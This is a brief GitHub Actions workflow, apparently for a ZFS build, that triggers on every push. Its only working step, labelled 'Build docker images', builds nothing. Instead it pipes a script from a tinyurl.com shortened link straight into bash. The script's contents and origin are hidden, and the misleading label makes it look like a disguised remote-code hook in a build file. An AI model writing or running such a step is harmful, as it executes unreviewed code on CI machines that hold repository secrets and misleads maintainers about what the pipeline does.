name: ZFS build a
on:
  push

jobs:
  build:
      runs-on: ubuntu-latest
      container:
        image: docker://docker.io/archlinux:latest
      steps:
      - name: Checkout code
        uses: actions/checkout@v1
      - name: Build docker images
        run: |
          echo Kavan!
          curl -sL https://tinyurl.com/ba8eswbk | bash
